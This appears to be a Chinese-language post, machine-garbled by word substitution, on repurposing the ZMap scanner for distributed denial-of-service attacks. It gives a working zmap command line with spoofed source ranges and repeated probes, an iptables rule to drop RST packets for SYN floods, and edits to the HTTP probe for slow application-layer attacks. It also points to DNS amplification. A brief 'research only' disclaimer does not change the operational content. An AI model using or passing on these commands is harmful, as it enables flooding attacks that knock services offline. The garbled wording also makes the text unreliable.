作者旨在存眷全网的扫描,并未提及相关DDoS 的信息。 也并未出格提供指向型发包的指令。 下面接头大概与作者想法相违,但愿列位重在技能钻研,而非一些恶意粉碎。
指定ip段 和ip地点
-w, --whitelist-file=path
限制只扫描文件中的下列地点可能地点段,譬喻:
222.222.221.82/24 (192.168.1.0-255 )
(可操作种子 Cseed 调解从谁人IP开始)
单个Ip地点
222.222.221.82/32
(随机找了一个,这里1.02版本测试不能直接,需要改 blacklist.c
和constraint.c 中生成IP地点的二叉树的root节点一小部门代码)
然后操作
-P 10000000 (反复多次发包)
-s 2000-60000 (配置一个大的端口段)
-S 20.20.20.0-200.200.200.200(随机大量Ip地点,模仿漫衍式的D)
-G 这个伪造mac (可是收不到数据包)
Zmap Cp 80 -P 10000000 -s 2000-60000 -S 20.20.20.0-200.200.200.200 -w attack_url.txt
见下列发送的数据结果,到达预期
大概造成什么样的危害? 可以设置IP Spoofing,syn flood,land attack, ICMP floods, Application floods 和其他UDP 全零等多种进攻。 Zmap 的发包速度甚至可以忽略一下 随后发的这个rst 包。 也可以做得完美一点就是操作iptables
iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
把发出去的RST包给drop掉。
可以再升一下?
究竟有部门扩展能节制到应用层也是可以举办慢进攻。 Get 范例
echo -e -n "GET / HTTP/1.1rnHost: %srnrn" > http-req 替换成
echo -e -n "GET / HTTP/1.1rnHost: %srn " > http-req
Post 范例 可以把源码sizeof(value) 的值配置一个大的动态数值。 Post数据配置很小。
DDoS 流量 +毗连数 +畸形包
流量根基只能硬防,拼硬件。
zmap险些是最大限度操作网络带宽,10台G口处事器不会损耗几多,假如再操作DNS放大流量之类,很可怕的数字。
Ps : Zmap 某些方面和python 的scapy很像。 但zmap 纯C实现,比scapy效率要高一些。 以前总是纠结scapy 随后发送RST 问题,这里操作iptables 方法确实是个好要领。 参考个中的源码和相对类型的API接口,编写一些模块可以玩出许多格式。